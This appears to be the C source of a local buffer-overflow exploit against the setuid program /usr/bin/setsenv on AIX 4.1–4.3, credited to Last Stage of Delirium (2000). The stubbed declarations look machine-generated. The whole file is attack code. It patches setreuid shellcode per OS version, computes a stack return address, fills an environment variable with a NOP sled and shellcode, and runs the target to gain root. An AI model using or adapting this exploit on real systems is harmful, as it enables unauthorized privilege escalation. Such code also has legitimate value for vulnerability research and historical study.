
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int ADRNUM ;
 int NOPNUM ;
 int atoi (char*) ;
 int execle (char*,char*,char*,int ,char**) ;
 int exit (int) ;
 int memcpy (char*,char*,int) ;
 int * nop ;
 int printf (char*,...) ;
 char* setreuidcode ;
 int sprintf (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;

main(int argc,char **argv,char **e){
    char buffer[20000],adr[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM sep 2000 poland  //lsd-pl.net/\n");
    printf("/usr/bin/setsenv for aix 4.1 4.2 4.3 4.3.x PowerPC/POWER\n\n");

    if(argc<2){
        printf("usage: %s 41|42|43|433\n",argv[0]);exit(-1);
    }

    switch(atoi(argv[1])){
    case 41: memcpy(&setreuidcode[40],"\x68\x03",2); break;
    case 42: memcpy(&setreuidcode[40],"\x71\x02",2); break;
    case 43: memcpy(&setreuidcode[40],"\x82\x04",2); break;
    case 433: memcpy(&setreuidcode[40],"\x92\x03",2); break;
    default: exit(-1);
    }

    i=0; while(*e++) i+=strlen(*e)+1;
    *((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;

    envp[0]=&buffer[1000];
    envp[1]=0;

    b=buffer;
    strcpy(b,"lsd=");b+=4;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    b=&buffer[1000];
    sprintf(b,"xxx=   ");b+=7;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    *b=0;

    execle("/usr/bin/setsenv","lsd",buffer,0,envp);
}
